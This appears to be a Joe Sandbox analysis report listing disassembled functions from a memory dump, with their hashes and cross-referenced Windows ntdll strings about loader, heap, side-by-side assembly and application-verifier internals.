                                                            • Opcode ID: ccf77b7148d04728bda325cddc5e82b90fa60fcb91dac9c65f36e7c58bec4446
                                                            • Instruction ID: 1023043354d18a0e41f6bd54fcc8b3a58d43a5c860a8696d2b07dad24ea7f459
                                                            • Opcode Fuzzy Hash: ccf77b7148d04728bda325cddc5e82b90fa60fcb91dac9c65f36e7c58bec4446
                                                            • Instruction Fuzzy Hash: 5481AE71A40348AFEB61CF98CC45FAEBBB5BB08B14F10805AF548B7280D775A945DF61
                                                            Function 00FC29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010025EB
                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01002409
                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0100261F
                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01002506
                                                            • @, xrefs: 0100259B
                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01002602
                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010022E4
                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01002624
                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01002412
                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01002498
                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010024C0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                            • API String ID: 0-4009184096
                                                            • Opcode ID: 762066d6360469e9fe5c3cde0ef9922d7f0976b52ab2db29bb40552c39fe855e
                                                            • Instruction ID: 717b8b18cc82141e6a790b92e8b12a0c53d6e48bd9cdadc8ec6abd27f62388af
                                                            • Opcode Fuzzy Hash: 762066d6360469e9fe5c3cde0ef9922d7f0976b52ab2db29bb40552c39fe855e
                                                            • Instruction Fuzzy Hash: AF02AFF2D002299BEB61DB14CD85BDEB7B8AB44714F0041EAE64DA7281DB309F84DF59
                                                            Function 01038B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                            • API String ID: 0-2515994595
                                                            • Opcode ID: 72f65ad241f1b35e6a64d51cb722b21ace382dc367ec81ed8db020a22d937e84
                                                            • Instruction ID: c0eae3acc4a6e1b720f84f3df69afe804cf67b829dc0519ab651b0af498acb0e
                                                            • Opcode Fuzzy Hash: 72f65ad241f1b35e6a64d51cb722b21ace382dc367ec81ed8db020a22d937e84
                                                            • Instruction Fuzzy Hash: 3C51CF711183059BD365EF288849BABBBECBFC4354F148A9EB99883241E774D504DB92
                                                            Function 01040274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            • API String ID: 0-1700792311
                                                            • Opcode ID: 1325b2134d4b0769d38a4f85848ea01d66c8f01d01e013c1c9d61c497a53cfb5
                                                            • Instruction ID: 382678716f2d798d9204262f1830630226232a329fd8e03300d2676b1e8c868f
                                                            • Opcode Fuzzy Hash: 1325b2134d4b0769d38a4f85848ea01d66c8f01d01e013c1c9d61c497a53cfb5
                                                            • Instruction Fuzzy Hash: 15D1CEB1504641DFDB12EF68C881AEEBBF1FF49B10F0880A9F685AB256C739D940DB54
                                                            Function 010189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • VerifierFlags, xrefs: 01018C50
                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01018A3D
                                                            • AVRF: -*- final list of providers -*- , xrefs: 01018B8F
                                                            • VerifierDlls, xrefs: 01018CBD
                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01018A67
                                                            • VerifierDebug, xrefs: 01018CA5
                                                            • HandleTraces, xrefs: 01018C8F
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                            • API String ID: 0-3223716464
                                                            • Opcode ID: 78a52980e2f06a6cb27a756ef86bdbef8497101004f390289067527fb3897ee1
                                                            • Instruction ID: 961df697dba500ae892626ba4ff07830ab88680ad2d0bb6282e20bdaa1d22817
                                                            • Opcode Fuzzy Hash: 78a52980e2f06a6cb27a756ef86bdbef8497101004f390289067527fb3897ee1
                                                            • Instruction Fuzzy Hash: 489135726093069FD321EF688C81B5EB7E4BB85714F44845AFAC46B249C73DAE00CB96
                                                            Function 00F9EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                            • API String ID: 0-1109411897
                                                            • Opcode ID: c67989fe2df67b1f5c2ebe6b782a80ce247f1d4d46aa0eb3335e913c8ac398ad
                                                            • Instruction ID: 5179ca45eaa6e4da3db90baf02141a02bfd68c54c4932ab1f8511adc6f532ad8
                                                            • Opcode Fuzzy Hash: c67989fe2df67b1f5c2ebe6b782a80ce247f1d4d46aa0eb3335e913c8ac398ad
                                                            • Instruction Fuzzy Hash: 83A25B71E056298FDF64DF14CC887AAB7B1AF45314F2442E9D909A72A0DB34AEC5EF40
                                                            Function 00FC63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-792281065
                                                            • Opcode ID: a36427f154686fa08bdabf11664c4b158d7fbc56f0c9e82ba9d4db701ebef283
                                                            • Instruction ID: c9d0353d9a7f3626c64b059fa316c9acef7e942b6dc94aae17f139e7e35e4cf7
                                                            • Opcode Fuzzy Hash: a36427f154686fa08bdabf11664c4b158d7fbc56f0c9e82ba9d4db701ebef283
                                                            • Instruction Fuzzy Hash: 46913831B083129BEB3AEF14DD46FAD77A0BB40B24F14016DEAC4AB2C1D7799801E795
                                                            Function 00F8645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 00FE99ED
                                                            • apphelp.dll, xrefs: 00F86496
                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 00FE9A01
                                                            • LdrpInitShimEngine, xrefs: 00FE99F4, 00FE9A07, 00FE9A30
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FE9A11, 00FE9A3A
                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 00FE9A2A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-204845295
                                                            • Opcode ID: 11b10afbe76683270e4588ee23059d4b908fd51343524ff131be999bc2c276ca
                                                            • Instruction ID: bbb959e359449300fe1a8d7a632f1701bb168d5da972a93611ffe03e23d0c489
                                                            • Opcode Fuzzy Hash: 11b10afbe76683270e4588ee23059d4b908fd51343524ff131be999bc2c276ca
                                                            • Instruction Fuzzy Hash: 9B51AF712083409BE320EF24DC42BAB77E4FF84B54F14492AF5859B1A1D778E944ABA3
                                                            Function 00FCC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • LdrpInitializeImportRedirection, xrefs: 01008177, 010081EB
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FCC6C3
                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 010081E5
                                                            • LdrpInitializeProcess, xrefs: 00FCC6C4
                                                            • Loading import redirection DLL: '%wZ', xrefs: 01008170
                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01008181, 010081F5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                            • API String ID: 0-475462383
                                                            • Opcode ID: 3edd50f79e21d7bdc408c02a6dfd85e6006a5416f1b29abcca24f58b3e94103a
                                                            • Instruction ID: d2cdf01f99b35935c57352319c49d9b4760c750b69482833d90803a93ab17e0a
                                                            • Opcode Fuzzy Hash: 3edd50f79e21d7bdc408c02a6dfd85e6006a5416f1b29abcca24f58b3e94103a
                                                            • Instruction Fuzzy Hash: 6C3115716483029BD224EF28DD46E5A77D5FF84B10F044569F8C8AB2D1E624EC04EBA3
                                                            Function 00FC2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 01002165
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 010021BF
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0100219F
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01002180
                                                            • RtlGetAssemblyStorageRoot, xrefs: 01002160, 0100219A, 010021BA
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01002178
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            • API String ID: 0-861424205
                                                            • Opcode ID: 56bd9871baf4dc37bd559794dbe2f258ad0a60a28c9185f8b8bf832405003d5c
                                                            • Instruction ID: ea14af81c242fc13aec0bd7e878d066028874714641904c626a772ecbe7db88c
                                                            • Opcode Fuzzy Hash: 56bd9871baf4dc37bd559794dbe2f258ad0a60a28c9185f8b8bf832405003d5c
                                                            • Instruction Fuzzy Hash: 82310936F40326B7F7229A558C8AF9E7678DFA4B50F154069FA08A7180D270DE01E6A2
                                                            Function 00FD096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00FD2DF0: LdrInitializeThunk.NTDLL ref: 00FD2DFA
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BA3
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0BB6
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D60
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FD0D74
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                            • String ID:
                                                            • API String ID: 1404860816-0
                                                            • Opcode ID: 612a0ff6a573247e83ad59de673f80185c91dc318ebff129f00768602470df75
                                                            • Instruction ID: fcaf03c86c9a068b9041355eb609f09f467636c8493e91f5e4ef831ef1651c29
                                                            • Opcode Fuzzy Hash: 612a0ff6a573247e83ad59de673f80185c91dc318ebff129f00768602470df75
                                                            • Instruction Fuzzy Hash: 7B427B71900715DFDB61CF68C881BAAB7F5BF04314F1845AAE989DB342DB70AA84DF60
                                                            Function 00F9A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            • API String ID: 0-379654539
                                                            • Opcode ID: 0c1cba55057eb49f7a008d93b0bf4e3bfeb650c69915ce3e8a320b30b784062c
                                                            • Instruction ID: d1702b654534be7d566c511bc18166ba44e93ed7e7c245373436b9254e5af93b
                                                            • Opcode Fuzzy Hash: 0c1cba55057eb49f7a008d93b0bf4e3bfeb650c69915ce3e8a320b30b784062c
                                                            • Instruction Fuzzy Hash: 71C1AD71608386CFEB11CF18C444B6AB7E4FF84714F14886AF9958B261E778C945EB93
                                                            Function 00FC8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 00FC855E
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FC8421
                                                            • LdrpInitializeProcess, xrefs: 00FC8422
                                                            • @, xrefs: 00FC8591
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-1918872054
                                                            • Opcode ID: 6ea49a61d8a723deb54d1e7a761be9dbfd85336f3079779aec006577e32b4b0c
                                                            • Instruction ID: 840d31eb3961a4f80c272c6d35ae849e94614ff23e8af1b8c4fe6e88b595f8b7
                                                            • Opcode Fuzzy Hash: 6ea49a61d8a723deb54d1e7a761be9dbfd85336f3079779aec006577e32b4b0c
                                                            • Instruction Fuzzy Hash: F291AC71508345AFE721DF20CD42FABB7E8BF88794F44092EFA8492141E778D905EB62
                                                            Function 00FC273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 010021DE
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 010021D9, 010022B1
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 010022B6
                                                            • .Local, xrefs: 00FC28D8
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                            • API String ID: 0-1239276146
                                                            • Opcode ID: 424e14a9b9165001b447a8600466935e8e77d5e6d09035611eadf701c9b58c31
                                                            • Instruction ID: b654ec8c95a2ccf9e8120be8a49d68b0216eb6b9fb70855edccc5acf6a01c1f3
                                                            • Opcode Fuzzy Hash: 424e14a9b9165001b447a8600466935e8e77d5e6d09035611eadf701c9b58c31
                                                            • Instruction Fuzzy Hash: 82A1A031D0022A9BDB65CF54CD89BA9B3B5FF58314F2541EED848A7291D7309E80EF91
                                                            Function 00FC4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0100342A
                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01003437
                                                            • RtlDeactivateActivationContext, xrefs: 01003425, 01003432, 01003451
                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01003456
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                            • API String ID: 0-1245972979
                                                            • Opcode ID: 35b5bf82a4bbdccea2fcc8053350ebb38d583a939ec0cca6ebbee593e687d105
                                                            • Instruction ID: fc2c4b774430ce4148068cda859c14f6c9631c9ac4d89412ef4b82fa81554f9d
                                                            • Opcode Fuzzy Hash: 35b5bf82a4bbdccea2fcc8053350ebb38d583a939ec0cca6ebbee593e687d105
                                                            • Instruction Fuzzy Hash: 31611236A44A129FE723CF18C952F2AB7E1AF80B60F15855DE8959F291CB74FC00DB91
                                                            Function 00F964AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 00FF106B
                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 00FF10AE
                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 00FF1028
                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 00FF0FE5
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                            • API String ID: 0-1468400865
                                                            • Opcode ID: 7f6db7943b79f50195f5bb2fc1090ff2cc177990ca87ccdcc2a073309dbc6072
                                                            • Instruction ID: 6f6c0f3eb271b920adac315546179bc1a8524ffefd45c5003a72a94b51d0382b
                                                            • Opcode Fuzzy Hash: 7f6db7943b79f50195f5bb2fc1090ff2cc177990ca87ccdcc2a073309dbc6072
                                                            • Instruction Fuzzy Hash: 827103B19043049FDB20EF14C885F9B7FA8EF54764F540469F9488B286D778D988EBD2
                                                            Function 00FB245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • apphelp.dll, xrefs: 00FB2462
                                                            • minkernel\ntdll\ldrinit.c, xrefs: 00FFA9A2
                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 00FFA992
                                                            • LdrpDynamicShimModule, xrefs: 00FFA998
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                            • API String ID: 0-176724104
                                                            • Opcode ID: 5332337af71bc4e90ee3e0a6ae7125c359d9c520861adff08dd30e627d1daf8e
                                                            • Instruction ID: 0da66aa6784865aa2b7ac46cd2748f4f9deb6ffbf1c138578d2d5bdffef61d4d
                                                            • Opcode Fuzzy Hash: 5332337af71bc4e90ee3e0a6ae7125c359d9c520861adff08dd30e627d1daf8e
                                                            • Instruction Fuzzy Hash: 84314AB2A10205EBDB30EF59C881EBD77B4FF84B24F160029F9846B265C7B99D41EB41
                                                            Function 00FA29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • HEAP[%wZ]: , xrefs: 00FA3255
                                                            • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 00FA327D
                                                            • HEAP: , xrefs: 00FA3264
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                            • API String ID: 0-617086771
                                                            • Opcode ID: 60742ac75185d11116849603346cf5a31d1f88d02951985e6fb4217b05584755
                                                            • Instruction ID: e278714c77de40e016443b273c7c9eeaecea2ca9fbb708f8d19b3ba709df599b
                                                            • Opcode Fuzzy Hash: 60742ac75185d11116849603346cf5a31d1f88d02951985e6fb4217b05584755
                                                            • Instruction Fuzzy Hash: 9F92CEB1E042499FDB25CF68C440BADBBF1FF4A314F188069E889AB351D735AA41EF50
                                                            Function 00FA0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                            • API String ID: 0-4253913091
                                                            • Opcode ID: cb182e541cc1c9fe5a4cdc6dfaffbb3b34bc30f5b87fb1ce0a4dd3808af19ee1
                                                            • Instruction ID: b88a182b56f5a3d6c6825e198f150eb61abcf5cf283dd110a98009e5163649d3
                                                            • Opcode Fuzzy Hash: cb182e541cc1c9fe5a4cdc6dfaffbb3b34bc30f5b87fb1ce0a4dd3808af19ee1
                                                            • Instruction Fuzzy Hash: 9DF1CEB1A00609DFDB14CF68D880B7AB7B5FF46710F248168E6469B391DB34ED41EB90
                                                            Function 00FB6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $@
                                                            • API String ID: 0-1077428164
                                                            • Opcode ID: 390d781ffc38b5a17107552523f78bef4f417cf121e7234923007d6d15667e45
                                                            • Instruction ID: c14bd70a4edc7fe2ab383c75919029815d721f91f2b6f8117db628b7a19513fa
                                                            • Opcode Fuzzy Hash: 390d781ffc38b5a17107552523f78bef4f417cf121e7234923007d6d15667e45
                                                            • Instruction Fuzzy Hash: A4C29972A083559FDB24DF25C881BABBBE5AFC8354F14892DE989C7250D734D804EF92
                                                            Function 00F8A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_f60000_PGK60fNNCZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: FilterFullPath$UseFilter$\??\
                                                            • API String ID: 0-2779062949
                                                            • Opcode ID: 50d45c186074bcc6d01349924f3d2a6e8fd95af6dd87d872186f8e6a62548260
                                                            • Instruction ID: f1d29c80cf358d562659a4d2117402a57d790fccf59734c2c1026999861d3222
                                                            • Opcode Fuzzy Hash: 50d45c186074bcc6d01349924f3d2a6e8fd95af6dd87d872186f8e6a62548260
                                                            • Instruction Fuzzy Hash: 02A17D71D112299BDB31EF25CC89BEAB7B8EF44710F1041EAE908A7250D7359E85DF90
                                                            Function 00FB0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
